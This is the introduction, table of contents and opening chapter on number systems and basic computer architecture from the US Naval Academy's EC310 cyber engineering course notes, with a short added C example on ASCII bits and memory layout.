EC310 Notes Version 2015.1 Patrick Vincent and Agur Adams

Introduction
1. One Command Away from Catastrophe
In his book Worm, The First Digital World War (Atlantic Monthly Press, 2011), author Mark Bowden opines:
Most people, even well-educated people with formidable language skills, folks with more than a passing
knowledge of word-processing software and spreadsheets and dynamic graphical displays, people who spend
hours every day with their fingertips on keyboards, whose livelihoods and even leisure-time preferences
increasingly depend on fluency with a variety of software remain utterly clueless about how any of it works.
The innards of mainframes and operating systems and networks are considered not just unfathomable but
somehow unknowable, or even not worth knowing, in the way that many people are content to regard
electricity as voodoo.
What happens when such people, albeit well-intentioned and bright, use DOD computer networks? The answer: Such
individuals open their computers and networks to malicious attack. In November 2008, a Pentagon employee arrived for work,
parked his car, and noticed thumb drives on the pavement. Not wanting to see resources go to waste, he collected the thumb
drives and proceeded to plug one into his office computer, thereby spreading a damaging virus throughout the secure classified
network he had access to use. Millions of man-hours expended on making a network secure can be wasted by one careless
user in the face of a devious foe. Dr. Paul Vixie, an Internet pioneer and former Chairman of the American Registry for Internet
Numbers (ARIN), is famously quoted as saying:
These security problems have been here so long that the only way I’ve been able to function at all is by
learning to ignore them. Or else I would be in a constant state of panic, unable to think or act constructively.
We have been one command away from catastrophe for a long time now.
And of course adversaries are continuously attempting to breach the security of DOD computers and networks. In the CNO’s
view, the Navy’s information capabilities must evolve from a 20th-century supporting function to a main battery of 21st-century
sea power. In this new vision for an information-centric Navy, information will be treated as a weapon across the full range of
military operations—on the sea, under the sea, on land, and in the air. The U.S. Navy, in the CNO’s words, “stands on the cusp
of a revolution comparable to the introduction of nuclear power into the Fleet.”
USNA has always adapted its academic program to satisfy the relevant needs of the Navy and Marine Corps. The curriculum
is continually adjusted in order to ensure that midshipmen are prepared academically for the current and emerging challenges
they will face as officers. Against the emerging cyber threat, USNA has deemed it urgent to tailor its program to meet the
specific needs of users in cyberspace. Thus, USNA endeavors to graduate officers with a common understanding of the
concepts, principles and applications of cyber security in order to ensure the protection and the availability of the Navy’s
information systems and networks. This understanding is provided by a two-course sequence: SI110 Introduction to Cyber
Security and EC310 Applications of Cyber Engineering.
“A cyber attack perpetrated by nation states or violent extremist groups could be as destructive as the terrorist attack of 9/11.
Such a destructive cyber terrorist attack could paralyze the nation.”
Former Defense Secretary Leon E. Panetta, July 2012
“Cyber has escalated from an issue of moderate concern to one of the most serious threats to our national security. We now
live in a world of weaponized bits and bytes, where an entire country can be disrupted by the click of a mouse.”
Gen. Martin E. Dempsey, Chairman of the Joint Chiefs of Staff, January 2013
“The United States is not adequately prepared for a serious cyberattack. In terms of preparation for a cyberattack on a critical
part of its network infrastructure, the U.S. is at a three on a scale of one to ten.”
Gen. Keith Alexander, Former Director of the National Security Agency, July 2012
You may be thinking to yourself: "I'm going to be a pilot (or a Marine, or a Submariner, etc.). I'm not going to be an Information
Warfare Officer. Why do I need to know this?" The simple answer: If you find yourself at a keyboard interfacing with a Navy
system, you are operating in the Navy's cyber domain. The trained and aware user is the first and most vital line of defense.
Any officer, in any warfare specialty, may find himself the critical link in his organization’s network security posture.
Are we trying to make every midshipman a cyber-security expert?
No. Unfortunately, we cannot.
You WILL learn cyber!
However, USNA can make every midshipman better educated to operate in a cyber warfare environment. The aim is not to
make every naval officer a cyber specialist; rather, the aim is to recognize and properly respond to the need that every member
of the Navy and Marine Corps be aware of the cyber threat and be enabled to operate in this environment.
The Navy requires a workforce that is able to continue warfighting operations while defending against cyber attacks. This
requires that every user have some level of knowledge. Without officers who understand the security of Navy information
systems, and the threats faced, it will be increasingly difficult to protect networks from the growing threats of criminal and
state-sponsored intrusions and disruptions. The average naval officer must become one who is informed and interested
in cyber warfare and thus able to responsibly inhabit a networked environment. The goal is to infuse a baseline scientific and
academic cyber security education in all midshipmen in order to address the need for cyber-capable unrestricted line officers
who understand the threats and vulnerabilities at a basic technical level.
So, while you will not leave this course as a cyber security expert, you will obtain the cohesive technical foundation necessary
to comprehend cyber topics as you encounter them in upper level courses, in your Professional Development activities, and in
the fleet.
But isn't this training, and isn't USNA supposed to be about education?
USNA must instill in its students this new awareness of cyber security, ever mindful of its status as a first-class undergraduate
institution. Thus, a proper balance must be maintained between theory and application.
Midshipmen at USNA are not trained specifically to operate in the air or under the sea. Instead, they are trained in the basics
of hard science to be applied to specific warfare fields. Likewise, a foundation must be provided for officers to operate in the
cyber domain. As more military officers find themselves engaged in fighting in cyberspace, they will increasingly need a
thorough understanding of the basic technical concepts that underlie battle in this domain. There exists a core of technical
academic material that can prepare officers to understand and operate in cyberspace. That core is provided in SI110 and EC310.
Thus, the mission of EC310 is to continue educating each midshipman about cyber infrastructure and systems, inherent cyber
vulnerabilities and threats, and appropriate defensive security procedures, thereby enabling them to make principled decisions
regarding the potential benefits, consequences, and risks from a proposed use of an information system in today’s cyber warfare
environment. EC310, as its own course, is separate and distinct from SI110, yet intended to be complementary so that it builds
upon the student’s existing body of technical knowledge while exposing new theory, principles, and information systems not
covered in SI110. It should be enjoyable and technically challenging, yet accessible to the entire student body regardless of
major.
2. EC310 Course Objectives
EC310 is not about memorization and regurgitation; rather, the goal is for students to leave the course with an understanding
of information systems at a depth sufficient to manipulate their operation in accordance with security principles. The successful
student will appreciate the decisions that weigh the cost of design complexity against the cost of security—engineering is often
a series of tradeoffs where security must be sacrificed in order to ensure functionality. A main theme which will be revisited
again and again is that trust is often an inherent assumption in system design, while security is an afterthought.
Upon completing this course, you should be able to:
1. Describe in depth the principles, mechanisms, and technologies of information systems’ hardware and software
in both computers and communications domains, and describe the development of typical exploits used against
vulnerabilities in information systems.
2. Identify action that can be taken to protect information systems’ hardware and software against potential exploits
in both computers and communications domains.
3. Trace the lifecycle of a program through development, compilation, and execution to explain the methodology
and ramifications of exploiting a process.
4. Discuss steps that should be taken to prevent a process from being exploited.
5. Describe the fundamental networking technologies and design principles behind internetworking and how these
can be exploited by malicious actors.
6. Discuss steps that should be taken to prevent networks from being exploited and identify who or what is
responsible for performing these preventative actions and where or when they should be applied.
7. Describe, qualitatively and quantitatively, how underlying electromagnetic spectrum technology is implemented
in wireless communication and electronic warfare systems.
8. Evaluate the security and robustness of communications systems by determining which characteristics allow a
system to transmit sensitive information to an intended receiver across a noisy or vulnerable channel.
3. Note: This Course is Not Easy!
Some courses at USNA are easy—you might find yourself in the occasional course that you can sleep through, limit your
studying to just a few hours the night before an exam, and have little difficulty achieving a passing grade.
EC310 is not such a course.
To do well in EC310, you will need to stay engaged, do the homework, ask questions in class and seek extra instruction at the
first sign of trouble. And, for your own good, DO NOT FALL BEHIND!
4. Plan for the Course
The course is divided into three parts. In Part I: The Host, you will examine specific threats against an individual computer
in isolation from a network. In Part II: The Network, you will gain an in-depth understanding of how the Internet works today
and how fragile its core infrastructure really is. Finally, in Part III: Wireless, you will gain an appreciation for the unique
security threats inherent when operating in a wireless environment.
Contents
Introduction ............................................................................................................................................ i
Part I: The Host...................................................................................................................................... 1
Chapter 1: Number Systems ............................................................................................................... 3
Reading ........................................................................................................................................ 15
Problems ...................................................................................................................................... 15
Security Exercise 1....................................................................................................................... 17
Chapter 2: C Programs ..................................................................................................................... 27
Reading ........................................................................................................................................ 41
Problems ...................................................................................................................................... 41
Security Exercise 2....................................................................................................................... 43
Chapter 3: Assembly Language and Memory ................................................................................... 57
Problems ...................................................................................................................................... 79
Security Exercise 3....................................................................................................................... 85
Chapter 4: Arrays and Strings .......................................................................................................... 95
Problems .................................................................................................................................... 105
Security Exercise 4..................................................................................................................... 109
Chapter 5: Intro to Pointers ............................................................................................................ 115
Problems .................................................................................................................................... 123
Security Exercise 5..................................................................................................................... 125
Chapter 6: Functions and the Stack ................................................................................................ 135
Problems .................................................................................................................................... 149
Security Exercise 6..................................................................................................................... 153
Chapter 7: The Buffer Overflow ..................................................................................................... 163
Problems .................................................................................................................................... 173
Security Exercise 7..................................................................................................................... 179
Chapter 8: The Heap ...................................................................................................................... 187
Problems .................................................................................................................................... 195
Security Exercise 8..................................................................................................................... 197
Chapter 9: Privilege Management .................................................................................................. 203
Problems .................................................................................................................................... 217
Security Exercise 9..................................................................................................................... 221
Chapter 10: A Real Buffer Overflow .............................................................................................. 231
Problems .................................................................................................................................... 241
Security Exercise 10 ................................................................................................................... 243
Part II: The Network .......................................................................................................................... 251
Chapter 11: The TCP/IP Model ...................................................................................................... 253
Problems .................................................................................................................................... 269
Chapter 12: Ethernet ...................................................................................................................... 271
Problems .................................................................................................................................... 281
Security Exercise 12 ................................................................................................................... 283
Chapter 13: Internet Protocol ......................................................................................................... 291
Problems .................................................................................................................................... 305
Security Exercise 13 ................................................................................................................... 309
Chapter 14: Routing Part I.............................................................................................................. 317
Problems .................................................................................................................................... 333
Security Exercise 14 ................................................................................................................... 335
Chapter 15: Routing Part II ............................................................................................................ 349
Problems .................................................................................................................................... 361
Security Exercise 15 ................................................................................................................... 365
Chapter 16: The Man-In-The-Middle Attack .................................................................................. 375
Problems .................................................................................................................................... 385
Security Exercise 16 ................................................................................................................... 389
Chapter 17: Border Gateway Protocol ............................................................................................ 395
Problems .................................................................................................................................... 409
Security Exercise 17 ................................................................................................................... 411
Chapter 18: Border Gateway Protocol Routing ............................................................................... 421
Problems .................................................................................................................................... 431
Security Exercise 18 ................................................................................................................... 433
Part III: Wireless ................................................................................................................................ 439
Chapter 19: Communications Systems, EM Spectrum, and Signals ............................................... 441
Problems .................................................................................................................................... 447
Security Exercise 19 ................................................................................................................... 449
Chapter 20: Intro to Modulation .................................................................................................... 457
Problems .................................................................................................................................... 467
Security Exercise 20 ................................................................................................................... 471
Chapter 21: Analog to Digital Conversion ..................................................................................... 477
Problems .................................................................................................................................... 489
Chapter 22: Digital Modulation ..................................................................................................... 491
Problems .................................................................................................................................... 501
Security Exercise 22 ................................................................................................................... 503
Chapter 23: Power Gain and SNR ................................................................................................. 509
Problems .................................................................................................................................... 515
Security Exercise 23 ................................................................................................................... 517
Chapter 24: Antennas .................................................................................................................... 523
Problems .................................................................................................................................... 533
Chapter 25: Propagation ................................................................................................................ 537
Problems .................................................................................................................................... 547
Security Exercise 25 ................................................................................................................... 549
Chapter 26: Electronic Warfare ..................................................................................................... 553
Security Exercise 26 ................................................................................................................... 559
Appendices ........................................................................................................................................ 569
Basic Linux Commands ................................................................................................................. 571
The Linux File System ................................................................................................................... 573
Brief Primer on gdb ...................................................................................................................... 577
Performing Base Conversions on the TI-nSpire CAS Calculator .................................................... 583
Answers to Selected Problems ....................................................................................................... 589
Authorship Notes
The first two parts—The Host and The Network—were drafted for the creation of the Naval Academy course
EC310, Applications of Cyber Engineering, during the 2014 academic year. These two sections were substantially revised
during the 2015 and 2016 academic years.
The third part—Wireless—was largely adapted from an existing course titled EE302, Electronic Communication Systems and
Digital Communications. The task of selecting information from EE302 for placement in EC310 was accomplished by
Jennie Wood, Chris Anderson, Jessie Atwood, Currie Wooten, Ryan Kelly, John Roth, Justin Blanco, and Ryan Whitty. Of
special note, Chapter 25, drafted by Chris Anderson, Jesse Atwood, and Jennie Wood, consists of new material composed for
EC310. Additionally, Security Exercise 26, drafted by Jennie Wood and Chris Anderson, is new for EC310. The entire
Wireless section was extensively edited and refined by Rob Ives and John Roth in the Spring of the 2015 academic year.
Acknowledgements
The following faculty members reviewed the entire course and offered many helpful suggestions which greatly improved the
course: Justin Blanco, Rita Doerr, Nicholas Rosasco, Kevin Fairbanks, John Roth, Ryan Kelly, Dane Brown, Richard Kopka
and Jay Benson. Beth Haneke offered expert advice throughout the process and greatly assisted with editing, formatting, and
preparing the manuscript for print.
Part I: The Host
First, we provide an in-depth understanding of how operating systems utilize high-speed memory. Armed
with this knowledge, we then describe the methodology of exploiting a process and we describe the tools
that can be used to mitigate exploits.
Chapter 1: Number Systems
Objectives:
(a) Discuss the role of the operating system in bridging the gap between hardware and user applications and services.
(b) Explain the relationship between secondary memory, main memory and the CPU.
(c) Explain the meaning of the terms byte, word and half-word.
(d) Convert between binary and decimal notation.
(e) Convert between hexadecimal and decimal notation.
(f) Convert between hexadecimal and binary notation.
(g) Evaluate how characters are stored using ASCII notation.
Let us begin by reviewing the basics of computer architecture, operating systems, and the binary and hexadecimal number
systems.
1. Basic Computer Architecture
1.1. Definition of a Computer. We adopt a very general and expansive definition of a computer. For our purposes, a
computer is a device that:
• Accepts input information from input devices.
• Stores data in memory so that it can be processed.
• Processes data (e.g., by performing arithmetic calculations and modifications). This processing of data is done by
the Central Processing Unit (CPU) according to instructions provided by the user.
• Produces output (usually the results of the processing) which is delivered to output devices.
Computers can perform complex calculations, search through large amounts of data, and sort huge amounts of information.
We can also perform these tasks, but computers can perform them quicker and with greater accuracy. Computer systems
consist of hardware and software. The hardware consists of the actual electrical and mechanical components that make up a
computer system. The software consists of the instructions that tell a computer how to do a specific job.
1.2. Input and Output Devices. Let's briefly discuss the main components of a computer's hardware, referring to Figure 1.1
on the next page. The computer accepts data from input devices. Examples of input devices are the mouse, the keyboard and
the network interface card. The computer delivers data to output devices. Examples of output devices are the monitor (i.e.,
the screen), the printer and the network interface card (the network interface card is both an input and an output device).
Figure 1.1. Basic Computer Architecture
1.3. Memory Concepts. All of the devices that store data within a computer can only be in one of two states. For example,
data might be stored using switches. But an individual switch can only be open or closed—only two states are possible if
switches are used. Alternatively, data may be stored on an optical disc. But, the data stored at any specific point on an optical
disc is represented by either a dark spot or a light spot—only two states are possible if optical media are used. If, on the other
hand, data is stored using capacitors, any individual capacitor can be either charged or uncharged—only two states are possible.
If magnetic media are used to store data, the data stored at any point is represented either by a magnetic pole with "north" at
the top, or a magnetic pole with "south" at the top—only two states are possible.
Since data can only be represented as one of two states, we refer to one state as a “1” and the other as a “0.” This is a binary
scheme. Each individual 1 or 0 is referred to as a binary digit (bit). All data within a computer is stored as bits, which we can
think of as a series of 1's and 0's. A collection of 8 bits is referred to as a byte.
A collection of four bytes (32 bits) is referred to as a word.[1] Two bytes is termed a half-word.
Bytes are grouped into even larger quantities as:
Kilobyte (KB) - 1024 bytes (2^10 bytes)
Megabyte (MB) - 1,048,576 bytes (2^20 bytes)
Gigabyte (GB) - 1,073,741,824 bytes (2^30 bytes)
A collection of four bits is called a nibble. Ha ha ha ha!!! That one always kills me!
The computer interprets the 1's and 0's as numbers, letters or other information according to a coding scheme. For example,
single characters such as individual letters are stored as bytes using a code called the ASCII (American Standard Code for
Information Interchange) code. Using ASCII, the letter A is stored as 01000001, the letter a is stored as 01100001, the
percent sign % is stored as 00100101, etc.
[1] The number of bits in a word (and even the definition of the term word) is ambiguous. In x86 assembly language, a word is actually defined to be 16 bits.
Some sources define a word to be the size of the CPU's internal registers, while others define it as the memory bus width. In EC310 we state that a word is
32 bits since that is the definition used by the gdb debugger to be introduced later.
1.4. Main Memory. Main memory stores the data that we input, stores the instructions that will process the data, and stores
the results of calculations until those results are moved to a permanent location. Think of main memory as the computer's
"scratch paper", or as a “waiting room” for data to be held in before and after it is processed.
Main memory is also called RAM—random access memory. Main memory is volatile; all data in main memory is lost when
the power is turned off.
Main memory can be thought of as a list of numbered locations. The number that identifies a memory location is called the
address of the memory location. The computer stores data in a memory location, and then uses the address to retrieve the data
when needed. In most computers, each individual memory location within main memory holds one byte of data. We might
have four consecutive items—W, X, Y and Z—stored in four consecutive bytes as shown below.
If the computer needs to store in main memory a data item that cannot be stored as a single byte, several adjacent bytes will be
used to hold the item. The address of the first of the bytes is used as the address when referencing the data item. In the picture
shown below, we say that data items W, X, Y and Z are stored consecutively in memory. The size of the memory location
holding data item Y is three bytes. The address of the memory location holding data item Y is 23. Similarly, the address of
data item Z is 26, and it is stored in two bytes.
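The ASCII byte patterns above and the byte-addressed memory picture (W, X, Y and Z stored consecutively, Y at address 23 in three bytes, Z at 26 in two) can be checked in a few lines of C. This is an added example, not code from the EC310 notes; it assumes a GCC/Clang compiler (for the `packed` attribute, which removes padding so the items really are adjacent) and the 32-bit word / 16-bit half-word sizes the notes adopt.

```c
/* Added example (not part of the EC310 notes): bits, bytes, words, and
 * the "main memory is a list of numbered byte-sized locations" model.
 * Assumes a GCC/Clang compiler; uint32_t/uint16_t give the notes' word
 * (4 bytes) and half-word (2 bytes) regardless of the host CPU. */
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stddef.h>

/* Write the 8-bit ASCII pattern of c into out (9 chars incl. the NUL),
 * most significant bit first: 'A' -> "01000001", 'a' -> "01100001". */
void ascii_bits(unsigned char c, char out[9]) {
    for (int i = 0; i < 8; i++) {
        out[i] = (c & (0x80 >> i)) ? '1' : '0';
    }
    out[8] = '\0';
}

/* Convenience check: does the bit pattern of c equal the expected string? */
int ascii_bits_match(unsigned char c, const char *expected) {
    char bits[9];
    ascii_bits(c, bits);
    return strcmp(bits, expected) == 0;
}

/* The same byte read back as a number. The bit pattern is identical;
 * only the coding scheme (ASCII vs. integer) decides what it "means". */
unsigned int byte_as_number(unsigned char c) { return (unsigned int)c; }

/* A record laid out like the notes' picture: consecutive items of
 * different sizes, each item's address being that of its first byte.
 * 'packed' is a GCC/Clang extension (assumption) that forbids padding. */
struct __attribute__((packed)) record {
    uint8_t  w;     /* 1 byte                      */
    uint16_t x;     /* 2 bytes: a half-word         */
    uint8_t  y[3];  /* 3 bytes, like item Y         */
    uint16_t z;     /* 2 bytes, like item Z         */
};

/* Offsets from the start of the record, i.e. the items' addresses if
 * the record began at address 0: W at 0, X at 1, Y at 3, Z at 6. */
size_t offset_of_y(void) { return offsetof(struct record, y); }
size_t offset_of_z(void) { return offsetof(struct record, z); }
size_t record_size(void) { return sizeof(struct record); }

/* If the record is placed so that Y sits at address 23, as in the notes,
 * Z's address is 23 plus the size of Y, i.e. 26. */
unsigned long address_of_z_given_y(unsigned long y_addr) {
    return y_addr + sizeof(((struct record *)0)->y);
}

int main(void) {
    char bits[9];
    const char *samples = "Aa%";   /* the three characters from the notes */
    for (const char *p = samples; *p; p++) {
        ascii_bits((unsigned char)*p, bits);
        printf("'%c' -> %s (as a number: %u)\n", *p, bits,
               byte_as_number((unsigned char)*p));
    }
    printf("word = %zu bytes, half-word = %zu bytes\n",
           sizeof(uint32_t), sizeof(uint16_t));
    printf("record: W@%zu X@%zu Y@%zu Z@%zu, %zu bytes in all\n",
           offsetof(struct record, w), offsetof(struct record, x),
           offset_of_y(), offset_of_z(), record_size());
    printf("if Y is at address 23, Z is at %lu\n", address_of_z_given_y(23));
    return 0;
}
```

Compile with gcc and run; gdb, introduced later in the course, lets you confirm the same offsets by examining the record's bytes in memory.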
1.5. Secondary Memory. Secondary memory is more permanent memory that provides long-term storage for data before and
after a computer is used. Examples of secondary memory include:
• A computer’s hard disk
• A CD or DVD
• Flash memory (such as a USB stick)
Data in secondary memory is stored in files. A file is a named collection of data.
Note that main and secondary memory serve different purposes. Main memory is very fast but is also very expensive. Main
memory is also volatile—all of the data in main memory is lost when you turn off your computer. Secondary memory is much
cheaper than main memory, but it is much slower (i.e., accessing data takes much longer). Secondary memory has the additional
advantage of being nonvolatile—you do not lose any data on your hard drive when you turn your computer off.
1.6. The Central Processing Unit (CPU). The CPU is the “brain” of the computer. The CPU circuitry executes the
instructions that process data. The CPU takes data and instructions from main memory, processes the data and instructions, and
then returns the results to main memory.
The CPU is only able to carry out a small set of very simple instructions. Complex tasks must be broken down into very
simple instructions taken from this set. The set of instructions a CPU is able to carry out is termed its instruction set. An
instruction in the instruction set tells the CPU to carry out a simple specific arithmetic, logical, control or memory access
operation. Sample CPU instructions include:
• Add, subtract, multiply, divide
• Move data from one memory location to another
• Compare two numbers to see which is greater
A CPU might have 100 to perhaps a thousand instructions in its instruction set. These instructions are implemented as electronic
circuits on the microprocessor chip.
The CPU only interacts with main memory; it does not interact directly with secondary memory. Since the CPU only interacts
with main memory, any program that your computer is running must be in main memory.
1.7. Software. Software consists of the instructions that tell a computer how to do a specific job. Software specifies how the
computer is to accept data from a user and how this data is to be processed. More formally, software is the set of programs
used by a computer. So…what is a program?
A computer program is a set of detailed instructions for a computer to follow to produce a specific result. A program tells a
computer how to interact with a user, perform a task, process data, etc. When we give a computer a program to follow, we are
said to be running the program, whereas the computer is said to be executing the program.
The most important software is the operating system. The operating system is a program that is “in charge” of all other
programs used by the computer. The operating system controls the computer’s hardware and software resources, and allocates
these resources as necessary to accomplish the desired task. Think of the operating system as a traffic cop or an air traffic
controller directing and coordinating activities.
The operating system acts as an interface between the computer and the user. We “communicate” with a computer via the
operating system. For instance, if we want to run an application program, say MSWORD, we “tell” this to the Windows
operating system, and the operating system then executes the MSWORD program. Common operating systems include
Windows, UNIX, Linux and Apple’s OS X.
We previously mentioned that any program that your computer is running must be in main memory. When your computer is
turned off, nothing resides in main memory. When you turn your computer on, the operating system is automatically copied
from the hard drive into main memory. When you tell the operating system that you want to run MSWORD (by, for example,
clicking on the MSWORD icon), the operating system copies the MSWORD program from your hard drive to main memory.
You may wonder: Can computers think? The answer is: No! Thankfully, no! Keep in mind: Computers only do what
programmers tell them to do (via programs). Computers solve problems after the programmer has formulated a solution.
2. Review of Number Systems
All data in a computer is represented in binary. The pictures of your summer vacation stored on your hard drive—it’s all bits.
The YouTube video of the cat falling off the chair that you saw this morning—bits. Your Facebook page—bits. The tweet you
sent—bits. The email from your professor telling you to spend less time on vacation, browsing YouTube, updating your
Facebook page and sending tweets—that’s bits too. Everything is bits.
We humans think about numbers using the decimal number system because we have ten fingers. Computers have only two
fingers, and therefore use the binary number system. We need to be able to readily shift between the binary and decimal
number representations. For instance, a decimal number can be represented as a sum of powers of 10. The decimal number
1,234 can be depicted as:
1 2 3 4 = 1·10³ + 2·10² + 3·10¹ + 4·10⁰ = 1,234₁₀
Here the digit 1 is in the 10³ = 1000 position (i.e., the thousands position), the digit 2 is in the 10² = 100 position (i.e., the
hundreds position), the digit 3 is in the 10¹ = 10 position (i.e., the tens position) and the digit 4 is in the 10⁰ = 1 position (i.e.,
the ones position). Thus,
1,234₁₀ = 1×10³ + 2×10² + 3×10¹ + 4×10⁰ = 1000 + 200 + 30 + 4
2.1. Converting a Binary Number to a Decimal Number. To convert a binary number to a decimal number, we simply
write the binary number as a sum of powers of 2. Following the example for decimal numbers, the binary number 1101 can
be depicted as:
1 1 0 1 = 1·2³ + 1·2² + 0·2¹ + 1·2⁰ = 13₁₀
Reading from the right, the positions are the 2⁰ = 1 position (i.e., the ones position), the 2¹ = 2 position (i.e., the twos
position), the 2² = 4 position (i.e., the fours position) and the 2³ = 8 position (i.e., the eights position). Thus,
1101₂ = 1·2³ + 1·2² + 0·2¹ + 1·2⁰ = 8 + 4 + 0 + 1 = 13₁₀
As a second example, consider converting the binary number 1011 to a decimal number. We note that the rightmost position
is the ones position and the bit value in this position is a 1. So, this rightmost bit has the decimal value of 1·2⁰. The next
position to the left is the twos position, and the bit value in this position is also a 1. So, this next bit has the decimal value of
1·2¹. The next position to the left is the fours position, and the bit value in this position is a 0. So, this bit has the decimal
value of 0·2². The leftmost position is the eights position, and the bit value in this position is a 1. So, this leftmost bit has the
decimal value of 1·2³. Thus:
1011₂ = 1·2³ + 0·2² + 1·2¹ + 1·2⁰ = 8 + 0 + 2 + 1 = 11₁₀
Practice Problem 1.1
Express the binary number 110110 as a decimal number.
Solution:
Given a binary number, you can now convert it to the equivalent decimal number. We will now convert numbers in the other
direction: from decimal to binary.
An Aside
Note that we do not cover the speedier method of converting from base 10 to base-2:
Repeated division by 2, forming the answer from the remainders at each step. In case you
do not recall this method, see:
https://www.youtube.com/watch?v=Q2UgMYwWiO4
We do not cover this method since it would take too long to explain why this method works
(an explanation/proof can be found in any discrete math textbook). The method that we do
present in the notes is more laborious to present, and more time-consuming to use, but
students have no difficulty in understanding why it works.
2.2. Converting a Decimal Number to a Binary Number. To convert the decimal number x to binary, we express the
decimal number as a sum of powers of 2:
Step 1. Find the highest power of two less than or equal to x. The binary representation will have a one in this
position. Denote the value of this highest power of 2 as y.
Step 2. Now subtract this power of two (y) from the decimal number (x), denoting the result as z: z = x − y.
Step 3. If z = 0, you are done. Otherwise, let x = z and return to Step 1 above.
For example, suppose we wanted to convert the decimal number 5 to binary. We first think to ourselves: “Self, what is the
largest power of 2 that is less than or equal to 5?” 2² = 4 is a power of 2 that is less than 5, but is it the largest? Obviously,
it is, since 2³ = 8. So, the largest power of 2 less than or equal to 5 is 2² = 4, and thus the binary representation of 5 will have
a one in the 2² = 4 position:
    2² = 4 position: 1
    2¹ = 2 position: _
    2⁰ = 1 position: _
Note that we have added placeholders for the positions of all powers of 2 less than 2². Our task now is to determine if these
positions should contain a one or a zero.
Subtracting 4 from our number 5 gives 5 − 4 = 1. Thus, 1 is now the number we are working with. We again ask: What is the
largest power of 2 that is less than or equal to 1? The answer is 2⁰ = 1, so the binary representation of 5 will have a one in the
2⁰ = 1 position:
    2² = 4 position: 1
    2¹ = 2 position: _
    2⁰ = 1 position: 1
Now, subtracting 2⁰ = 1 from the number we are working with (also 1) gives 0, so we are done. Filling in zeros in all remaining
positions (i.e., all positions that do not have a 1), we have our answer: The decimal number 5 in binary is:
    2² = 4 position: 1
    2¹ = 2 position: 0
    2⁰ = 1 position: 1
or, 5₁₀ = 101₂.
Practice Problem 1.2
Convert the decimal number 148 to binary.
Solution:
The binary representations of the decimal numbers 0 through 15 are shown below.
Decimal   Binary        Decimal   Binary
   0      0000             8      1000
   1      0001             9      1001
   2      0010            10      1010
   3      0011            11      1011
   4      0100            12      1100
   5      0101            13      1101
   6      0110            14      1110
   7      0111            15      1111
You may be wondering about the leading zeros in the table above. For example, the decimal number 5 is represented in the
table as the binary number 0101. We could have represented the binary equivalent of 5 as 101, 00101, 0000000101, or
with any other number of leading zeros. All answers are correct.
Sometimes, though, you will be given the size of a storage location. When you are given the size of the storage location,
include the leading zeros to show all bits in the storage location. For example, if told to represent decimal value 5 as an 8-bit
binary number (i.e., a byte), your answer should be 00000101.
2.3. The Hexadecimal Number System. Why Hexadecimal? We often have to deal with large positive binary numbers.
For instance, consider that computers connect to the Internet using a Network Interface Card (NIC). Every NIC in the world
is assigned a unique 48-bit identifier as an Ethernet address. The intent is that no two NICs in the world will have the same
address. A sample Ethernet address might be:
000000000100011101011110011111111001001000110110
As another example, computer engineers must oftentimes look at the contents of a specific item in computer memory. You
might, for instance, have to look at a variable that is stored at address:
00000000000100101111111101111100
You would probably agree that these long binary strings are cumbersome to transcribe or to read off to a coworker. Even if
you have come to love the binary number system, you would still likely agree that these long strings are too much of a good
thing.
Fortunately, large binary numbers can be made much more compact—and hence easier to work with—if represented in base-16,
the so-called hexadecimal number system. You may wonder: Binary numbers would also be more compact if represented
in base-10—why not just convert them to decimal? The answer, as you will soon see, is that converting between binary and
hexadecimal is exceedingly easy—much easier than converting between binary and decimal.
The Hexadecimal (Base-16) Number System has 16 digits:
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, A, B, C, D, E, F
Note that the single hexadecimal symbol A is equivalent to the decimal number 10, the single symbol B is equivalent to the
decimal number 11, and so forth, with the symbol F being equivalent to the decimal number 15.
Just as with decimal notation or binary notation, we again write a number as a string of symbols, but now each symbol is one
of the 16 possible hexadecimal digits (0 through F). To interpret a hexadecimal number, we multiply each digit by the power
of 16 associated with that digit’s position.
For example, consider the hexadecimal number 1A9B. Indicating the values associated with the positions of the symbols, this
number is illustrated as:
    1 is in the 16³ = 4096 position
    A is in the 16² = 256 position
    9 is in the 16¹ = 16 position
    B is in the 16⁰ = 1 position
2.4. Converting a Hexadecimal Number to a Decimal Number. To convert a hexadecimal number to a decimal number,
write the hexadecimal number as a sum of powers of 16. For example, considering the hexadecimal number 1A9B above, we
convert this to decimal as:
1A9B = 1·16³ + A·16² + 9·16¹ + B·16⁰
     = 4096 + 10(256) + 9(16) + 11(1) = 6811
Practice Problem 1.3
Express the hexadecimal number 3CB as a decimal number.
Solution:
2.5. Converting a Decimal Number to a Hexadecimal Number. To convert a decimal number to hexadecimal, you use an
approach similar to that used in converting a decimal number to binary. But, instead of finding the largest power of 2 less than
or equal to the decimal number, you find the largest power of 16 less than or equal to the given decimal number. You then
subtract the number of multiples of this largest power of 16 from the given number and repeat the process with the result of the
subtraction.
For example, to convert the decimal number 746 to hexadecimal, we proceed as follows: We first note that the powers of 16
are: 16⁰ = 1, 16¹ = 16, 16² = 256, 16³ = 4096, ... and we note that the largest power of 16 less than or equal to 746 is
16² = 256. So, when we convert 746 to hexadecimal, the result will have three hexadecimal digits:
    _ _ _   (16² position, 16¹ position, 16⁰ position)
We next determine how many “256's” are in 746. The answer is 2, since (256)(2) = 512 and (256)(3) = 768 > 746:
    2 _ _
Now, subtracting (256)(2) = 512 from our original decimal value 746 results in 234. We now repeat this process for the decimal
value of 234.
The largest power of 16 that is less than or equal to 234 is 16. How many 16’s are contained within 234? The answer is 14,
since (16)(14) = 224 and (16)(15) = 240 > 234. Since 14 is the hexadecimal digit E, we have:
    2 E _
Now, subtracting (16)(14) = 224 from our decimal value 234 results in 10. We now repeat this process for the decimal value
of 10. This is easy… there are 10 ones (i.e., ten 16⁰’s) in 10… and 10 is the hexadecimal digit A, so we have:
    2 E A
So, the decimal number 746 = 2EA in hexadecimal.
Note that with hexadecimal notation, as with binary and decimal notation, we must be careful that the base is understood.
When we speak of the number “23”, do we mean the decimal number 23 (in base 10), or do we mean the hexadecimal number
23 (which happens to equal 35 in base 10)? If the base is not clear from the context, it can be made explicit by including the
base as a subscript, as in: 23₁₆ = 35₁₀.
Some texts use the prefix 0x to indicate that a number is hexadecimal. That is, instead of writing 23₁₆ some texts will use the
notation 0x23. We will often follow this convention.
Practice Problem 1.4
Convert the decimal number 2576 to hexadecimal.
Solution.
2.6. Converting a Hexadecimal Number to a Binary Number. Engineers often have to convert between binary and
hexadecimal, but this is quite simple to do.
We can convert directly from hexadecimal notation to the equivalent binary representation by using the following procedure:
• Convert each hexadecimal digit to a four-digit binary number, independent of the other hexadecimal digits.
